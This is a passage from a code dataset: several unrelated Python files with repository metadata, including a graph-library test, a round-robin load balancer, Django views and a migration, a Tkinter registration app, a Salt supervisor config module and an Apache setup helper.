| 32.519802 | 99 | 0.662506 | 1,099 | 6,569 | 3.704277 | 0.165605 | 0.035372 | 0.019897 | 0.014738 | 0.329403 | 0.309998 | 0.218865 | 0.188897 | 0.164333 | 0.140752 | 0 | 0.035375 | 0.182372 | 6,569 | 201 | 100 | 32.681592 | 0.722584 | 0.031664 | 0 | 0.248588 | 0 | 0 | 0.037777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.00565 | 0.039548 | null | null | 0.022599 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788d68479fe04280827b76769dc0786af1cc14a6 | 2,674 | py | Python | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 242 | 2015-01-01T08:40:28.000Z | 2022-03-18T05:22:09.000Z | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 99 | 2015-01-24T07:55:27.000Z | 2021-10-30T18:20:13.000Z | dev/examples/tungraph.py | Cam2337/snap-python | 0bf722b461f8b5aae3ecb2757313521e9e9e76f1 | [
"BSD-3-Clause"
] | 105 | 2015-03-03T06:45:17.000Z | 2022-02-24T15:52:40.000Z | import random
import sys
sys.path.append("../swig-r")
import snap
def PrintGStats(s, Graph):
'''
Print graph statistics
'''
print "graph %s, nodes %d, edges %d, empty %s" % (
s, Graph.GetNodes(), Graph.GetEdges(),
"yes" if Graph.Empty() else "no")
def DefaultConstructor():
'''
Test the default constructor
'''
Graph = snap.TUNGraph()
PrintGStats("DefaultConstructor:Graph",Graph)
def ManipulateNodesEdges():
'''
Test node, edge creation
'''
NNodes = 10000
NEdges = 100000
FName = "test.graph"
Graph = snap.TUNGraph()
t = Graph.Empty()
# create the nodes
for i in range(0, NNodes):
Graph.AddNode(i)
t = Graph.Empty()
n = Graph.GetNodes()
# create random edges
NCount = NEdges
while NCount > 0:
x = int(random.random() * NNodes)
y = int(random.random() * NNodes)
# skip the loops in this test
if x != y and not Graph.IsEdge(x,y):
n = Graph.AddEdge(x, y)
NCount -= 1
PrintGStats("ManipulateNodesEdges:Graph1",Graph)
# get all the nodes
NCount = 0
NI = Graph.BegNI()
while NI < Graph.EndNI():
NCount += 1
NI.Next()
# get all the edges for all the nodes
    ECount1 = 0
NI = Graph.BegNI()
while NI < Graph.EndNI():
ECount1 += NI.GetOutDeg()
NI.Next()
ECount1 = ECount1 / 2
# get all the edges directly
    ECount2 = 0
EI = Graph.BegEI()
while EI < Graph.EndEI():
ECount2 += 1
EI.Next()
print "graph ManipulateNodesEdges:Graph2, nodes %d, edges1 %d, edges2 %d" % (
NCount, ECount1, ECount2)
# assignment
    Graph1 = Graph
PrintGStats("ManipulateNodesEdges:Graph3",Graph1)
# save the graph
FOut = snap.TFOut(snap.TStr(FName))
Graph.Save(FOut)
FOut.Flush()
# load the graph
FIn = snap.TFIn(snap.TStr(FName))
Graph2 = snap.TUNGraph(FIn)
PrintGStats("ManipulateNodesEdges:Graph4",Graph2)
# remove all the nodes and edges
for i in range(0, NNodes):
n = Graph.GetRndNId()
Graph.DelNode(n)
PrintGStats("ManipulateNodesEdges:Graph5",Graph)
Graph1.Clr()
PrintGStats("ManipulateNodesEdges:Graph6",Graph1)
def GetSmallGraph():
'''
Test small graph
'''
Graph = snap.TUNGraph()
Graph.GetSmallGraph()
PrintGStats("GetSmallGraph:Graph",Graph)
if __name__ == '__main__':
print "----- DefaultConstructor -----"
DefaultConstructor()
print "----- ManipulateNodesEdges -----"
ManipulateNodesEdges()
print "----- GetSmallGraph -----"
GetSmallGraph()
| 21.739837 | 81 | 0.590501 | 297 | 2,674 | 5.289562 | 0.3367 | 0.098663 | 0.032463 | 0.028008 | 0.061108 | 0.061108 | 0.038192 | 0.038192 | 0 | 0 | 0 | 0.022268 | 0.277861 | 2,674 | 122 | 82 | 21.918033 | 0.7913 | 0.081152 | 0 | 0.180556 | 0 | 0 | 0.174596 | 0.081624 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041667 | null | null | 0.069444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
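`ManipulateNodesEdges` counts edges two ways and halves the degree sum; that is the handshake identity for undirected graphs. It can be checked without SNAP (the node and edge counts below are arbitrary):

```python
import random

# Build a random simple undirected graph, mirroring the loop above
# that skips self-loops and already-present edges.
random.seed(7)
edges = set()
while len(edges) < 100:
    x, y = random.randrange(50), random.randrange(50)
    if x != y:
        edges.add((min(x, y), max(x, y)))

# Summing out-degrees over all nodes double-counts each undirected
# edge, hence the ECount1 / 2 in the SNAP test.
degree = {}
for x, y in edges:
    degree[x] = degree.get(x, 0) + 1
    degree[y] = degree.get(y, 0) + 1

print(sum(degree.values()) // 2 == len(edges))  # → True
```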
788e0638a7912e25398b0f82d66adabc2d629b91 | 1,381 | py | Python | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | from typing import List
class ServerConfig:
def __init__(self, addr: str, weight: int):
self.addr: str = addr
self.weight: int = weight
self.cur_weight: int = 0
def __repr__(self):
return f"\n [Server]addr:{self.addr}, weigh:{self.weight}, cur_weight:{self.cur_weight}"
class WeightedRoundRobin:
def __init__(self):
self.server_list: List[ServerConfig] = []
def load_config(self, config):
for addr, weight in config:
self.server_list.append(
ServerConfig(addr, weight)
)
def next_item(self) -> str:
index = -1
total = 0
size = len(self.server_list)
for i in range(size):
self.server_list[i].cur_weight += self.server_list[i].weight
total += self.server_list[i].weight
if index == -1 or self.server_list[index].cur_weight < self.server_list[i].cur_weight:
index = i
self.server_list[index].cur_weight -= total
print(self.server_list)
return self.server_list[index].addr
def test():
config = [
("192.168.0.1", 1),
("192.168.0.2", 2),
("192.168.0.3", 1),
]
robin = WeightedRoundRobin()
robin.load_config(config)
for i in range(12):
print(i, robin.next_item())
if __name__ == "__main__":
test()
| 24.660714 | 99 | 0.577118 | 180 | 1,381 | 4.194444 | 0.266667 | 0.145695 | 0.203974 | 0.07947 | 0.193377 | 0.157616 | 0 | 0 | 0 | 0 | 0 | 0.033916 | 0.295438 | 1,381 | 55 | 100 | 25.109091 | 0.742035 | 0 | 0 | 0 | 0 | 0.025 | 0.088342 | 0.038378 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.025 | 0.025 | 0.275 | 0.05 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
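The scheduler above implements nginx-style smooth weighted round-robin: each pick raises every running weight by its static weight, takes the maximum, and charges the winner the weight total. A compact re-derivation of that step (server names are placeholders):

```python
# Smooth weighted round-robin, matching next_item above: bump each
# current weight by its static weight, pick the largest (first wins
# on ties, as in the strict < comparison above), then subtract the
# total weight from the winner.
def smooth_wrr(servers, rounds):
    cur = [0] * len(servers)
    total = sum(w for _, w in servers)
    picks = []
    for _ in range(rounds):
        for i, (_, w) in enumerate(servers):
            cur[i] += w
        best = max(range(len(servers)), key=lambda i: cur[i])
        cur[best] -= total
        picks.append(servers[best][0])
    return picks

# Weights 1:2:1 yield the evenly interleaved repeating cycle b, a, c, b.
print(smooth_wrr([("a", 1), ("b", 2), ("c", 1)], 8))
# → ['b', 'a', 'c', 'b', 'b', 'a', 'c', 'b']
```

Spreading the heavier server's turns across the cycle (rather than running them back to back) is the point of the running-weight bookkeeping.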
788e8236832189bd8502b010fdb3dd0a1e59ce61 | 2,181 | py | Python | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-25 22:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('store', '0013_auto_20220224_2311'),
]
operations = [
migrations.RenameModel(
old_name='CartItem',
new_name='OrderItem',
),
migrations.RemoveField(
model_name='order',
name='address_detail',
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('stripe_charge_id', models.CharField(max_length=50)),
('amount', models.DecimalField(decimal_places=2, max_digits=6)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('modified', models.DateTimeField(auto_now=True)),
('city', models.CharField(max_length=256)),
('street_1', models.CharField(max_length=256)),
('street_2', models.CharField(blank=True, max_length=256, null=True)),
('zip_code', models.CharField(max_length=10)),
('comment', models.TextField(blank=True, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='order',
name='address',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.DO_NOTHING, to='store.address'),
preserve_default=False,
),
]
| 38.946429 | 121 | 0.581843 | 224 | 2,181 | 5.486607 | 0.419643 | 0.032547 | 0.045566 | 0.071603 | 0.387307 | 0.310822 | 0.25712 | 0.25712 | 0.25712 | 0.133442 | 0 | 0.032134 | 0.286566 | 2,181 | 55 | 122 | 39.654545 | 0.757712 | 0.021091 | 0 | 0.306122 | 1 | 0 | 0.093296 | 0.010783 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
789ecd7f205ac32e1321d079bdbf084feed9bd43 | 2,628 | py | Python | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | null | null | null | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | 31 | 2017-10-23T20:21:11.000Z | 2017-12-14T00:28:56.000Z | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import authenticate, login
from django.views.generic import View
from django.contrib.auth.models import User
from .forms import UserForm
from .models import UserProfile, Project, Tag
from .search import get_query
def Leaderboard(request):
users = User.objects.all()[:5]
context = {"users":users}
return render(request, 'volunteerapp/leaderboard.html', context)
def ProjectDetail(request, project_id):
project = get_object_or_404(Project, pk=project_id)
context = {"project":project}
return render(request, 'volunteerapp/project_detail.html', context)
def Index(request):
projects = []
query_string = ''
selected_tag = ''
tags = Tag.objects.all()
project_set = Project.objects
if ('tag' in request.GET) and request.GET['tag']:
try:
selected_tag = int(request.GET['tag'])
project_set = Tag.objects.get(id=selected_tag).project_set
except ValueError as e:
pass
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
search_query = get_query(query_string, ['title', 'description'])
project_set = project_set.filter(search_query).order_by('-created_at')
projects = project_set.all()
context = {"projects": projects, "query_string": query_string, "tags": tags, "selected_tag": selected_tag}
return render(request, 'volunteerapp/index.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'volunteerapp/registration_form.html'
# display empty form
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
# process form post
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
# any custom validation or cleaning
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
if len(password) < 8: # if password is shorter than 8 chars
return redirect(self)
user.save()
if user.profile is None:
user.profile = UserProfile()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('volunteerapp:index')
return render(request, self.template_name, {'form': form})
| 36.5 | 110 | 0.651065 | 316 | 2,628 | 5.281646 | 0.316456 | 0.03595 | 0.05692 | 0.055722 | 0.115039 | 0.115039 | 0.051528 | 0.051528 | 0 | 0 | 0 | 0.00501 | 0.240487 | 2,628 | 71 | 111 | 37.014085 | 0.831162 | 0.040335 | 0 | 0.035088 | 0 | 0 | 0.098927 | 0.047279 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087719 | false | 0.070175 | 0.122807 | 0 | 0.385965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |

# ===========================================================================
# File: registration.py  (repo: shubham9019/omega_attendance_manager, MIT)
# ===========================================================================
from tkinter import *
from tkinter import messagebox
import sys
import os
import signal
import time
from subprocess import *
from tkinter.scrolledtext import ScrolledText
import sqlite3


def file_previous_close():
    try:
        with open('home_id.txt', 'r') as f:
            lines = f.read().splitlines()
        last_line = lines[-1]
        page = lines[-2]
        if page != 'registration':
            os.kill(int(last_line), signal.SIGKILL)
    except Exception:
        print('first instance, no need to close previous file')


# file_previous_close()


def writing_id():
    file_home_id = open("home_id.txt", "w+")
    home_id = os.getpid()
    file_home_id.writelines('registration\n')
    file_home_id.writelines(str(home_id))
    file_home_id.close()
    print('writing id')
    print(home_id)


def write_message_no(number):
    file = open("message.txt", "w+")
    file.writelines(number)
    file.close()


def login_details(username, password):
    file = open("login_details.txt", "w+")
    file.writelines(username + '\n')
    file.writelines(password)
    file.close()


# writing_id()
class Home():
    def __init__(self, master):
        menu = Menu(master)
        master.config(menu=menu)

        home = Menu(menu)
        menu.add_cascade(label='Home', menu=home)
        home.add_command(label='How to use?', command=self.take_a_tour)
        home.add_command(label='Terms of Use', command=self.terms_of_use)
        home.add_separator()

        login_option = Menu(menu)
        menu.add_cascade(label='Register and Login', menu=login_option)
        login_option.add_command(label='Login', command=self.login)
        login_option.add_command(label='Register', command=self.register)
        login_option.add_separator()

        submenu = Menu(menu)
        menu.add_cascade(label='Help', menu=submenu)
        submenu.add_command(label='Contact Us', command=self.contact_us)
        submenu.add_command(label='FAQs', command=self.faq)
        submenu.add_separator()

        about_us = Menu(menu)
        menu.add_cascade(label='About Us', menu=about_us)
        about_us.add_command(label='About us', command=self.about_us)
        about_us.add_separator()

        exit_button = Menu(menu)
        menu.add_cascade(label='Exit', menu=exit_button)
        exit_button.add_command(label='Exit', command=menu.quit)
        # could add a yes/no confirmation prompt here
        exit_button.add_command(label='Minimize', command=self.minimize)

        # login frame starts here
        frame = Frame(master)
        self.username = StringVar(master)
        self.password = StringVar()
        self.name = StringVar()
        self.dob = StringVar()
        self.email = StringVar()
        self.mobile_number = StringVar()
        self.aadhar_number = StringVar()
        self.variable = StringVar(master)
        self.address_var = StringVar()
        self.variable.set("Select Post:")  # default value

        post_employee = Label(master, text="Post:")
        # options menu for the employee's post
        w = OptionMenu(master, self.variable, "Maintainance", "Developer", "Engineer", "HR")
        w.pack(padx=15, pady=3)

        employee_name = Label(master, text="Name:")
        employee_name.pack(padx=15, pady=4)
        employee_name_entry = Entry(master, bd=5, textvariable=self.name)
        employee_name_entry.pack(padx=24, pady=4)

        Label1 = Label(master, text='Username:')
        Label1.pack(padx=15, pady=5)
        entry1 = Entry(master, bd=5, textvariable=self.username)
        entry1.pack(padx=15, pady=5)

        email_label = Label(master, text='Email:')
        email_label.pack(padx=15, pady=6)
        email_entry = Entry(master, bd=5, textvariable=self.email)
        email_entry.pack(padx=15, pady=6)

        mobile_label = Label(master, text="Mobile:")
        mobile_label.pack(padx=15, pady=7)
        mobile_entry = Entry(master, bd=5, textvariable=self.mobile_number)
        mobile_entry.pack(padx=15, pady=7)

        aadhar_label = Label(master, text="Aadhar:")
        aadhar_label.pack(padx=15, pady=8)
        aadhar_entry = Entry(master, bd=5, textvariable=self.aadhar_number)
        aadhar_entry.pack(padx=15, pady=8)

        Label2 = Label(master, text='Password: ')
        Label2.pack(padx=15, pady=9)
        entry2 = Entry(master, show="*", bd=5, textvariable=self.password)
        entry2.pack(padx=15, pady=9)

        address_label = Label(master, text='Address:')
        address_label.pack(padx=15, pady=10)
        large_font = ('Verdana', 30)
        address_entry = Entry(master, textvariable=self.address_var, bd=10, font=large_font)
        address_entry.pack(padx=15, pady=10)

        btn = Button(frame, text='Register', command=self.register_submit)
        btn.pack(side=RIGHT, padx=5)
        frame.pack(padx=100, pady=19)
    def register_submit(self):
        self.select_employee_type = self.variable.get()
        self.username_call = self.username.get()
        self.name_call = self.name.get()
        self.email_call = self.email.get()
        self.aadhar_number_call = self.aadhar_number.get()
        self.mobile_number_call = self.mobile_number.get()
        self.password_call = self.password.get()
        self.address_call = self.address_var.get()
        try:
            conn = sqlite3.connect('omega.db')
            register_db_object = conn.cursor()
            login_db_object = conn.cursor()
        except Exception:
            messagebox.showinfo("Failed", "Can't connect to the server")
            print("can't connect")
            return

        # salary depends on the selected post; Engineer and HR share the default
        if self.select_employee_type == 'Maintainance':
            self.salary = '30000'
        elif self.select_employee_type == 'Developer':
            self.salary = '130000'
        else:
            self.salary = '70000'

        counter = 0
        try:
            register_db_object.execute(
                "INSERT INTO register (username,password,salary,aadhar_number,email,name,post,phone,address) "
                "values (?,?,?,?,?,?,?,?,?)",
                (self.username_call, self.password_call, self.salary, self.aadhar_number_call, self.email_call,
                 self.name_call, self.select_employee_type, self.mobile_number_call, self.address_call))
            conn.commit()
            login_db_object.execute(
                "INSERT INTO main.login_details (username,password) values (?,?)",
                (self.username_call, self.password_call))
            conn.commit()
            conn.close()
            counter = 1
        except Exception:
            messagebox.showinfo("Failed", "Can't Register :( Username Occupied ")

        try:
            print("Checking for mobile number")
            write_message_no(self.mobile_number_call)
        except Exception:
            print("Can't Write Mobile Number")

        try:
            def send_email(user, pwd, recipient, subject, body):
                import smtplib
                FROM = user
                TO = recipient if isinstance(recipient, list) else [recipient]
                SUBJECT = subject
                TEXT = body
                # prepare the actual message
                message = "From: %s\nTo: %s\nSubject: %s\n\n%s" % (FROM, ", ".join(TO), SUBJECT, TEXT)
                server = smtplib.SMTP("smtp.gmail.com", 587)
                server.ehlo()
                server.starttls()
                server.login(user, pwd)
                server.sendmail(FROM, TO, message)
                server.close()

            email = ''
            pwd = ''
            recipient = self.email_call
            subject = 'Registered with Omega'
            body = ('Hi ' + self.name_call +
                    ',\nYou have successfully registered with Omega Employee Management' +
                    '\nRegards,\nTeam Omega')
            send_email(email, pwd, recipient, subject, body)
            print("mail sent")
        except Exception:
            messagebox.showinfo("Error while sending Mail", "Mail can't be sent")

        if counter != 0:
            messagebox.showinfo("Successfully Registered", "Taking you to the Login Page")
            call('python login.py', shell=True)
    def contact_us(self):
        # show a message box with contact details
        messagebox.showerror(
            "Contact Us",
            "You can contact us at shubham9019@gmail.com in case the software "
            "doesn't respond or for any suggestions for improvements.")
        print("contact")

    def faq(self):
        # message box listing FAQs (not implemented yet)
        print('he')

    def login(self):
        print('login ')
        call('python login.py', shell=True)

    def register(self):
        # create a register Frame
        print('register')
        # sys.exit()

    def take_a_tour(self):
        # take a tour of the app
        tour_take = Toplevel()
        tour_take.geometry("220x180")
        tour_take.title("Take a Tour")
        message = Message(tour_take, text="Go to the Register and Login section to register as an "
                                          "employee. You need to provide the required details. After "
                                          "registration is completed you can log in with your credentials "
                                          "to access your employee dashboard.\n\n")
        message.grid(row=0, column=1)
        button = Button(tour_take, text="Close", command=tour_take.destroy)
        button.grid(row=6, column=1)
        print('take a tour')

    def terms_of_use(self):
        string_terms = '''Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: \n \n The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.'''
        dialog = Toplevel()
        dialog.geometry("310x260")
        dialog.title("Terms of Use")
        message = Message(dialog, text=string_terms)
        message.grid(row=0, column=0)
        button = Button(dialog, text="Close", command=dialog.destroy)
        button.grid(row=4, column=0)
        print('message box showing the terms of use')

    def about_us(self):
        top = Toplevel()
        top.geometry("230x200")
        top.title("About Us")
        msg = Message(top, text='This is the Omega Employee Management System. It was primarily built '
                                'as a basic Employee Management System for a university curriculum '
                                'project, and after continued improvement and new features it was made '
                                'public.\n\n')
        msg.grid(row=0, column=15)
        button = Button(top, text="Okay", command=top.destroy)
        button.grid(row=4, column=15)
        print('Display your info')

    def minimize(self):
        print('minimize the window')


root = Tk()
login_home = Home(root)
root.wm_geometry("1360x1200")
root.title("Register Here")
root.mainloop()
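The `home_id.txt` handshake that `file_previous_close` and `writing_id` implement above (page name on one line, the writer's PID on the next, so a later process can decide whether to kill an earlier one) can be exercised standalone. The helper names `write_id`/`read_id` below are illustrative, not part of the original script:

```python
import os
import tempfile

# Standalone sketch of the home_id.txt handshake: one line carrying the page
# name, one carrying the writing process's PID.
def write_id(path, page):
    with open(path, 'w') as fh:
        fh.write(page + '\n')
        fh.write(str(os.getpid()))

def read_id(path):
    with open(path) as fh:
        page, pid = fh.read().splitlines()
    return page, int(pid)

with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, 'home_id.txt')
    write_id(target, 'registration')
    page, pid = read_id(target)
    print(page, pid == os.getpid())  # → registration True
```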

# ===========================================================================
# File: mc_supervisor.py  (repo: makinacorpus/makina-states, BSD-3-Clause)
# ===========================================================================
# -*- coding: utf-8 -*-
'''
.. _module_mc_supervisor:

mc_supervisor / supervisor functions
============================================

'''
# Import python libs
import logging

import mc_states.api

__name = 'supervisor'

log = logging.getLogger(__name__)


def settings():
    '''
    supervisor settings

    location
        installation directory
    '''
    @mc_states.api.lazy_subregistry_get(__salt__, __name)
    def _settings():
        supervisor_reg = __salt__[
            'mc_macros.get_local_registry'](
                'supervisor', registry_format='pack')
        locs = __salt__['mc_locations.settings']()
        user = 'user'
        pw = supervisor_reg.setdefault(
            'password',
            __salt__['mc_utils.generate_password']())
        sock = '/tmp/supervisor.sock'
        data = __salt__['mc_utils.defaults'](
            'makina-states.services.monitoring.supervisor', {
                'location': locs['apps_dir'] + '/supervisor',
                'venv': '{location}/venv',
                'conf': '/etc/supervisord.conf',
                'rotate': __salt__['mc_logrotate.settings'](),
                'pidf': locs['var_run_dir'] + '/supervisord.pid',
                'includes': ' '.join([
                    '/etc/supervisor.d/*.conf',
                    '/etc/supervisor.d/*.ini',
                ]),
                'services': ['ms_supervisor'],
                'configs': {
                    '/etc/supervisord.conf': {"mode": "644"},
                    '/etc/logrotate.d/supervisor.conf': {"mode": "644"},
                    '/usr/bin/ms_supervisorctl': {"mode": "755"},
                    '/etc/init.d/ms_supervisor': {"mode": "755"},
                    '/etc/systemd/system/ms_supervisor.service': {
                        "mode": "644"}
                },
                'requirements': ['supervisor==3.2.0'],
                # parameters to set in the supervisor configuration sections
                'program': {
                    'autostart': 'true',
                    'autorestart': 'true',
                    'stopwaitsecs': '10',
                    'startsecs': '10',
                    'umask': '022',
                },
                'inet_http_server': {
                    'port': 9001,
                    'username': user,
                    'password': pw,
                },
                'unix_http_server': {
                    'file': sock,
                    'chmod': '0777',
                    'chown': 'nobody:nogroup',
                    'username': user,
                    'password': pw,
                },
                'supervisord': {
                    'logdir': '/var/log/supervisor',
                    'logfile': '/var/log/supervisord.log',
                    'logfile_maxbytes': '50MB',
                    'logfile_backups': '10',
                    'loglevel': 'info',
                    'pidfile': '/var/run/supervisord.pid',
                    'nodaemon': 'false',
                    'minfds': '1024',
                    'minprocs': '200',
                    'umask': '022',
                    'user': 'root',
                    'identifier': 'supervisor',
                    'directory': '/tmp',
                    'tmpdir': '/tmp',
                    'nocleanup': 'true',
                    'childlogdir': '/tmp',
                    'strip_ansi': 'false',
                    'environment': '',
                },
                'supervisorctl': {
                    'serverurl': 'unix://{0}'.format(sock),
                    'username': user,
                    'password': pw,
                    'history_file': '/etc/supervisor.history',
                    'prompt': "supervisorctl",
                },
            })
        __salt__['mc_macros.update_local_registry'](
            'supervisor', supervisor_reg,
            registry_format='pack')
        return data
    return _settings()

# ===========================================================================
# File: test_redis_ack_able_consumer.py  (repo: DJMIN/funboost, Apache-2.0)
# ===========================================================================
"""
Used to test, with Redis as the broker, whether killing the process at any
point loses tasks.
"""
import time

from funboost import boost, BrokerEnum


@boost('test_cost_long_time_fun_queue2', broker_kind=BrokerEnum.REDIS_ACK_ABLE, concurrent_num=5)
def cost_long_time_fun(x):
    print(f'consuming {x} ...')
    time.sleep(3)
    print(f'finished consuming {x}')


if __name__ == '__main__':
    cost_long_time_fun.consume()
cost_long_time_fun.consume() | 23.6 | 97 | 0.731638 | 52 | 354 | 4.538462 | 0.673077 | 0.101695 | 0.152542 | 0.190678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.127119 | 354 | 15 | 98 | 23.6 | 0.754045 | 0.101695 | 0 | 0 | 0 | 0 | 0.199357 | 0.096463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |

# ===========================================================================
# File: exercise-07.py  (repo: elarabyelaidy19/awesome-reading, MIT)
# ===========================================================================
# Write a program that asks the user for a weight in kilograms and converts it to pounds. There
# are 2.2 pounds in a kilogram.
# Enter a weight in kilograms: 7
# The weight in pounds is: 15.4
kilograms = eval(input('Enter a weight in kilograms: '))
pounds = kilograms * 2.2
print('The weight in pounds is:', pounds)
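The conversion the exercise describes (2.2 pounds per kilogram) can also be wrapped in a small reusable function; `kg_to_pounds` is an illustrative name, not from the book:

```python
# A minimal sketch of the same conversion as a reusable function.
def kg_to_pounds(kilograms):
    return kilograms * 2.2

print(kg_to_pounds(7))  # ≈ 15.4, matching the sample run in the comments above
```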

# ===========================================================================
# File: wt_plus/core/http.py  (repo: andersoncustodio/wt-plus, BSD-3-Clause)
# ===========================================================================
import os
import re

from jinja2 import Template


class Http(object):
    def __init__(self, config):
        self.config = config

    def install(self):
        os.system(rf'mkdir -p {self.config.wt_config_path}/sites')
        os.system(rf'mkdir -p {self.config.wt_config_path}/log')
        os.system(rf'mkdir -p {self.config.wt_config_path}/config')
        os.system(r'sudo apt install -y apache2')
        os.system(r'sudo a2enmod ssl')
        os.system(r'sudo a2enmod actions fcgid alias proxy_fcgi')
        os.system(r'sudo a2enmod rewrite')
        os.system(r'sudo a2enmod headers')
        os.system(r'sudo a2enmod expires')
        os.system(r'sudo a2enmod include')
        os.system(r'sudo a2enmod proxy')
        os.system(r'sudo a2enmod proxy_http')
        os.system(r'sudo a2enmod proxy_wstunnel')

    def configure(self):
        self.install()

        # Add custom wt config for the home user
        config_wt = f'Timeout -1\n\nIncludeOptional {self.config.wt_config_path}/sites/*.conf\n'
        os.system(fr'sudo /bin/bash -c "echo \"{config_wt}\" > /etc/apache2/conf-available/wt.conf"')

        # Configure envvars
        os.system(fr'sudo sed -i "s,^\(export APACHE_RUN_USER=\).*,\1{self.config.user},g" /etc/apache2/envvars')
        os.system(fr'sudo sed -i "s,^\(export APACHE_RUN_GROUP=\).*,\1{self.config.user},g" /etc/apache2/envvars')
        os.system(r"sudo sed -i 's/Listen 80/Listen 0.0.0.0:80/g' /etc/apache2/ports.conf")
        os.system(r"sudo sed -i 's/Listen 443/Listen 0.0.0.0:443/g' /etc/apache2/ports.conf")
        os.system('sudo a2enconf wt.conf')
        self.restart()

    def start(self):
        os.system('sudo systemctl start apache2')

    def stop(self):
        os.system('sudo systemctl stop apache2')

    def restart(self):
        os.system('sudo systemctl stop apache2 && sudo systemctl start apache2')

    def enable(self):
        os.system('sudo systemctl enable apache2')

    def disable(self):
        os.system('sudo systemctl disable apache2')

    def filter_proxies(self, proxies):
